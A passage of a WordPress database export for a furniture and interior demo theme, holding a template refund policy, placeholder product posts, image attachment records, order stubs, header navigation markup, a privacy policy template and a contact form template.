-->\n<!-- wp:paragraph -->\n<p>Our refund and returns policy lasts 30 days. If 30 days have passed since your purchase, we can’t offer you a full refund or exchange.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>To be eligible for a return, your item must be unused and in the same condition that you received it. It must also be in the original packaging.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Several types of goods are exempt from being returned. Perishable goods such as food, flowers, newspapers or magazines cannot be returned. We also do not accept products that are intimate or sanitary goods, hazardous materials, or flammable liquids or gases.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additional non-returnable items:</p>\n<!-- /wp:paragraph -->\n<!-- wp:list -->\n<ul>\n<li>Gift cards</li>\n<li>Downloadable software products</li>\n<li>Some health and personal care items</li>\n</ul>\n<!-- /wp:list -->\n<!-- wp:paragraph -->\n<p>To complete your return, we require a receipt or proof of purchase.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Please do not send your purchase back to the manufacturer.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>There are certain situations where only partial refunds are granted:</p>\n<!-- /wp:paragraph -->\n<!-- wp:list -->\n<ul>\n<li>Book with obvious signs of use</li>\n<li>CD, DVD, VHS tape, software, video game, cassette tape, or vinyl record that has been opened.</li>\n<li>Any item not in its original condition, is damaged or missing parts for reasons not due to our error.</li>\n<li>Any item that is returned more than 30 days after delivery</li>\n</ul>\n<!-- /wp:list -->\n<!-- wp:paragraph -->\n<h2>Refunds</h2>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Once your return is received and inspected, we will send you an email to notify you that we have received your returned item. We will also notify you of the approval or rejection of your refund.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>If you are approved, then your refund will be processed, and a credit will automatically be applied to your credit card or original method of payment, within a certain amount of days.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<b>Late or missing refunds</b>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>If you haven’t received a refund yet, first check your bank account again.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Then contact your credit card company, it may take some time before your refund is officially posted.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Next contact your bank. There is often some processing time before a refund is posted.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>If you’ve done all of this and you still have not received your refund yet, please contact us at {email address}.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<b>Sale items</b>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Only regular priced items may be refunded. Sale items cannot be refunded.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<h2>Exchanges</h2>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>We only replace items if they are defective or damaged. If you need to exchange it for the same item, send us an email at {email address} and send your item to: {physical address}.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<h2>Gifts</h2>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>If the item was marked as a gift when purchased and shipped directly to you, you’ll receive a gift credit for the value of your return. Once the returned item is received, a gift certificate will be mailed to you.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>If the item wasn’t marked as a gift when purchased, or the gift giver had the order shipped to themselves to give to you later, we will send a refund to the gift giver and they will find out about your return.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<h2>Shipping returns</h2>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>To return your product, you should mail your product to: {physical address}.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>You will be responsible for paying for your own shipping costs for returning your item. Shipping costs are non-refundable. If you receive a refund, the cost of return shipping will be deducted from your refund.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Depending on where you live, the time it may take for your exchanged product to reach you may vary.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>If you are returning more expensive items, you may consider using a trackable shipping service or purchasing shipping insurance. We don’t guarantee that we will receive your returned item.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<h2>Need help?</h2>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Contact us at {email} for questions related to refunds and returns.</p>\n<!-- /wp:paragraph -->','Refund and Returns Policy','','publish','closed','closed','','refund_returns-2','','','2022-06-27 10:26:18','2022-06-27 10:26:18','',0,'https://demo.ovatheme.com/retirio/?page_id=3388',0,'page','',0),(3425,1,'2022-06-27 10:39:38','2022-06-27 10:39:38','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.','Classic chair','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','classic-chair','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3425',0,'product','',0),(3463,1,'2022-06-28 01:35:56','2022-06-28 01:35:56','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable','Comfy chair','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','comfy-chair','','','2022-06-28 01:35:56','2022-06-28 01:35:56','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3463',0,'product','',0),(3477,1,'2022-06-28 01:49:27','2022-06-28 01:49:27','','Order &ndash; June 28, 2022 @ 01:49 AM','','wc-processing','open','closed','wc_order_A33xobqTOxMZi','order-jun-28-2022-0149-am','','','2022-06-28 01:49:27','2022-06-28 01:49:27','',0,'https://demo.ovatheme.com/retirio/?post_type=shop_order&amp;p=3477',0,'shop_order','',0),(3539,1,'2022-06-28 02:18:47','2022-06-28 02:18:47','','image-bg-a','','inherit','open','closed','','image-bg-a','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/image-bg-a.jpg',0,'attachment','image/jpeg',0),(3570,1,'2022-06-28 02:32:28','2022-06-28 02:32:28','','bg-couter','','inherit','open','closed','','bg-couter','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-couter.png',0,'attachment','image/png',0),(3589,1,'2022-06-28 02:46:30','2022-06-28 02:46:30','','bg-section-1','','inherit','open','closed','','bg-section-1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',38,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/bg-section-1.png',0,'attachment','image/png',0),(3727,1,'2022-06-28 08:32:42','2022-06-28 08:32:42','','Order &ndash; June 28, 2022 @ 08:32 AM','','wc-processing','open','closed','wc_order_PULHZTn1JkAni','order-jun-28-2022-0832-am','','','2022-06-28 08:32:42','2022-06-28 08:32:42','',0,'https://demo.ovatheme.com/retirio/?post_type=shop_order&amp;p=3727',0,'shop_order','',0),(3728,1,'2022-06-28 09:11:51','2022-06-28 09:11:51','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.','Boss chair','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','boss-chair','','','2022-06-28 09:11:51','2022-06-28 09:11:51','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3728',0,'product','',0),(3729,1,'2022-06-28 09:12:39','2022-06-28 09:12:39','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable','Sofa chair','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','sofa-chair','','','2022-06-28 09:12:39','2022-06-28 09:12:39','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3729',0,'product','',0),(3730,1,'2022-06-28 09:13:41','2022-06-28 09:13:41','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.','Wooden stool','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','wooden-stool','','','2022-06-28 09:13:41','2022-06-28 09:13:41','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3730',0,'product','',0),(3782,1,'2022-06-28 09:40:14','2022-06-28 09:40:14','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.','Study lamp','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','study-lamp','','','2022-06-28 09:40:14','2022-06-28 09:40:14','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3782',0,'product','',0),(3783,1,'2022-06-28 09:40:50','2022-06-28 09:40:50','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable.','Round chair','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','round-chair','','','2022-06-28 09:40:50','2022-06-28 09:40:50','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3783',0,'product','',0),(3784,1,'2022-06-28 09:41:34','2022-06-28 09:41:34','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable','Big stool','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','big-stool','','','2022-11-14 03:31:02','2022-11-14 03:31:02','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3784',0,'product','',0),(3788,1,'2022-06-28 09:42:13','2022-06-28 09:42:13','Lorem ipsum dolor sit amet, cibo mundi ea duo, vim exerci phaedrum. There are many variations of passages of Lorem Ipsum available, but the majority have alteration in some injected or words which don\'t look even slightly believable. If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrang hidden in the middle of text.\r\n<ul>\r\n 	<li><strong>Nam at elit nec neque suscipit gravida.</strong></li>\r\n 	<li><strong>Aenean egestas orci eu maximus tincidunt.</strong></li>\r\n 	<li><strong>Curabitur vel turpis id tellus cursus laoreet.</strong></li>\r\n</ul>\r\nAll the Lorem Ipsum generators on the Internet tend to repeat predefined chunks as necessary, making this the first true generator on the Internet. It uses a dictionary of over 200 Latin words, combined with a handful of model sentence structures, to generate Lorem Ipsum which looks reasonable','Decorative lamp','Aliquam hendrerit a augue insuscipit. Etiam aliquam massa quis des mauris commodo venenatis ligula commodo leez sed blandit convallis dignissim onec vel pellentesque neque.','publish','open','closed','','decorative-lamp','','','2022-11-14 03:31:02','2022-11-14 03:31:02','',0,'https://demo.ovatheme.com/retirio/?post_type=product&amp;p=3788',0,'product','',0),(3838,1,'2022-06-29 01:42:21','2022-06-29 01:42:21','','line-1','','inherit','open','closed','','line-1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/line-1.png',0,'attachment','image/png',0),(3839,1,'2022-06-29 01:42:26','2022-06-29 01:42:26','','line-2','','inherit','open','closed','','line-2','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/line-2.png',0,'attachment','image/png',0),(3938,1,'2022-06-29 03:22:27','2022-06-29 03:22:27','','background-service-home-1','','inherit','open','closed','','background-service-home-1','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/background-service-home-1.png',0,'attachment','image/png',0),(3980,1,'2022-06-29 04:14:20','2022-06-29 04:14:20','','decor-primary-home-3','','inherit','open','closed','','decor-primary-home-3','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-primary-home-3.png',0,'attachment','image/png',0),(3991,1,'2022-06-29 04:17:00','2022-06-29 04:17:00','.elementor-star-rating{\n	    font-family: eicons !important;\n		\n}','retirio-child','','publish','closed','closed','','retirio-child','','','2022-06-29 04:17:00','2022-06-29 04:17:00','',0,'https://demo.ovatheme.com/retirio/retirio-child/',0,'custom_css','',0),(4065,1,'2022-06-29 07:19:22','2022-06-29 07:19:22','','product-01','','inherit','open','closed','','product-01','','','2022-06-29 07:19:22','2022-06-29 07:19:22','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-01.jpg',0,'attachment','image/jpeg',0),(4066,1,'2022-06-29 07:19:23','2022-06-29 07:19:23','','product-02','','inherit','open','closed','','product-02','','','2022-06-29 07:19:23','2022-06-29 07:19:23','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-02.jpg',0,'attachment','image/jpeg',0),(4067,1,'2022-06-29 07:19:23','2022-06-29 07:19:23','','product-03','','inherit','open','closed','','product-03','','','2022-06-29 07:19:23','2022-06-29 07:19:23','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-03.jpg',0,'attachment','image/jpeg',0),(4068,1,'2022-06-29 07:19:24','2022-06-29 07:19:24','','product-04','','inherit','open','closed','','product-04','','','2022-06-29 07:19:24','2022-06-29 07:19:24','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-04.jpg',0,'attachment','image/jpeg',0),(4069,1,'2022-06-29 07:19:24','2022-06-29 07:19:24','','product-05','','inherit','open','closed','','product-05','','','2022-06-29 07:19:24','2022-06-29 07:19:24','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-05.jpg',0,'attachment','image/jpeg',0),(4070,1,'2022-06-29 07:19:25','2022-06-29 07:19:25','','product-06','','inherit','open','closed','','product-06','','','2022-06-29 07:19:25','2022-06-29 07:19:25','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-06.jpg',0,'attachment','image/jpeg',0),(4071,1,'2022-06-29 07:19:25','2022-06-29 07:19:25','','product-07','','inherit','open','closed','','product-07','','','2022-06-29 07:19:25','2022-06-29 07:19:25','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-07.jpg',0,'attachment','image/jpeg',0),(4072,1,'2022-06-29 07:19:26','2022-06-29 07:19:26','','product-08','','inherit','open','closed','','product-08','','','2022-06-29 07:19:26','2022-06-29 07:19:26','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-08.jpg',0,'attachment','image/jpeg',0),(4073,1,'2022-06-29 07:19:27','2022-06-29 07:19:27','','product-09','','inherit','open','closed','','product-09','','','2022-06-29 07:19:27','2022-06-29 07:19:27','',0,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/product-09.jpg',0,'attachment','image/jpeg',0),(4075,1,'2022-06-29 07:32:02','2022-06-29 07:32:02','','Order &ndash; June 29, 2022 @ 07:32 AM','','wc-processing','open','closed','wc_order_gTwKys1qXuYrd','order-jun-29-2022-0732-am','','','2022-06-29 07:32:02','2022-06-29 07:32:02','',0,'https://demo.ovatheme.com/retirio/?post_type=shop_order&amp;p=4075',0,'shop_order','',0),(4387,1,'2022-06-30 03:38:09','2022-06-30 03:38:09','','decor-home-1-about-interior','','inherit','open','closed','','decor-home-1-about-interior','','','2022-11-14 03:31:01','2022-11-14 03:31:01','',22,'https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg',0,'attachment','image/jpeg',0),(4492,1,'2022-06-07 06:47:56','2022-06-07 06:47:56','<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:57px\" \n				/>\n				<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/bahaus_logo.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:57px\" \n				/>\n							</a>\n		<nav>\n            <button>\n            		Menu            	\n            </button>\n			<ul id=\"menu-primary\"><li id=\"menu-item-30\"><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li id=\"menu-item-774\"><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li id=\"menu-item-4715\"><a href=\"#\">Projects</a>\n<ul>\n	<li id=\"menu-item-4675\"><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li id=\"menu-item-4691\"><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li id=\"menu-item-4762\"><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li id=\"menu-item-773\"><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>        </nav>\n						<form role=\"search\" method=\"get\" action=\"https://bauhaus.futuremediatrix.com/\">\n						        <input type=\"search\" placeholder=\"Search …\" value=\"\" name=\"s\" title=\"Search for:\" />\n				   			 	<button type=\"submit\">\n				   			 	</button>\n						</form>									\n		<nav>\n            <button>\n            </button>\n            <nav >\n				<ul id=\"menu-primary-1\"><li><a href=\"https://bauhaus.futuremediatrix.com/\">Home</a></li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/about/\">About</a></li>\n<li><a href=\"#\">Projects</a>\n<ul>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/residential/\">Residential</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/commercial/\">Commercial</a></li>\n	<li><a href=\"https://bauhaus.futuremediatrix.com/office/\">Office</a></li>\n</ul>\n</li>\n<li><a href=\"https://bauhaus.futuremediatrix.com/contact/\">Contact</a></li>\n</ul>			</nav>\n        </nav>','Header 1','','publish','closed','closed','','header-1','','','2023-09-22 11:02:31','2023-09-22 11:02:31','',0,'https://demo.ovatheme.com/retirio/?post_type=ova_framework_hf_el&#038;p=12',0,'ova_framework_hf_el','',0),(4613,1,'2022-06-06 03:35:55','2022-06-06 03:35:55','<!-- wp:heading --><h2>Who we are</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>Our website address is: https://demo.ovatheme.com/retirio.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Comments</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>When visitors leave comments on the site we collect the data shown in the comments form, and also the visitor&#8217;s IP address and browser user agent string to help spam detection.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>An anonymized string created from your email address (also called a hash) may be provided to the Gravatar service to see if you are using it. The Gravatar service privacy policy is available here: https://automattic.com/privacy/. After approval of your comment, your profile picture is visible to the public in the context of your comment.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Media</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>If you upload images to the website, you should avoid uploading images with embedded location data (EXIF GPS) included. Visitors to the website can download and extract any location data from images on the website.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Cookies</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>If you leave a comment on our site you may opt-in to saving your name, email address and website in cookies. These are for your convenience so that you do not have to fill in your details again when you leave another comment. These cookies will last for one year.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you visit our login page, we will set a temporary cookie to determine if your browser accepts cookies. This cookie contains no personal data and is discarded when you close your browser.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>When you log in, we will also set up several cookies to save your login information and your screen display choices. Login cookies last for two days, and screen options cookies last for a year. If you select &quot;Remember Me&quot;, your login will persist for two weeks. If you log out of your account, the login cookies will be removed.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>If you edit or publish an article, an additional cookie will be saved in your browser. This cookie includes no personal data and simply indicates the post ID of the article you just edited. It expires after 1 day.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Embedded content from other websites</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>Articles on this site may include embedded content (e.g. videos, images, articles, etc.). Embedded content from other websites behaves in the exact same way as if the visitor has visited the other website.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>These websites may collect data about you, use cookies, embed additional third-party tracking, and monitor your interaction with that embedded content, including tracking your interaction with the embedded content if you have an account and are logged in to that website.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Who we share your data with</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>If you request a password reset, your IP address will be included in the reset email.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>How long we retain your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>If you leave a comment, the comment and its metadata are retained indefinitely. This is so we can recognize and approve any follow-up comments automatically instead of holding them in a moderation queue.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>For users that register on our website (if any), we also store the personal information they provide in their user profile. All users can see, edit, or delete their personal information at any time (except they cannot change their username). Website administrators can also see and edit that information.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>What rights you have over your data</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>If you have an account on this site, or have left comments, you can request to receive an exported file of the personal data we hold about you, including any data you have provided to us. You can also request that we erase any personal data we hold about you. This does not include any data we are obliged to keep for administrative, legal, or security purposes.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Where your data is sent</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong>Suggested text: </strong>Visitor comments may be checked through an automated spam detection service.</p><!-- /wp:paragraph -->','Privacy Policy','','publish','closed','open','','privacy-policy-2','','','2022-06-06 03:35:55','2022-06-06 03:35:55','',0,'https://demo.ovatheme.com/retirio/?page_id=3',0,'page','',0),(4614,1,'2022-06-06 04:13:24','2022-06-06 04:13:24','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@_>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[_site_admin_email]\nReply-To: [your-email]\n\n0\n0\n\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@_>\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[your-email]\nReply-To: [_site_admin_email]\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.','Contact form 1','','publish','closed','closed','','contact-form-1-2','','','2022-06-06 04:13:24','2022-06-06 04:13:24','',0,'https://demo.ovatheme.com/retirio/?post_type=wpcf7_contact_form&amp;p=6',0,'wpcf7_contact_form','',0),(4615,1,'2022-06-07 06:47:56','2022-06-07 06:47:56','<a href=\"https://demo.ovatheme.com/retirio/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Architecture &amp; Interior WordPress Theme\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n		<nav>\n            <button>\n      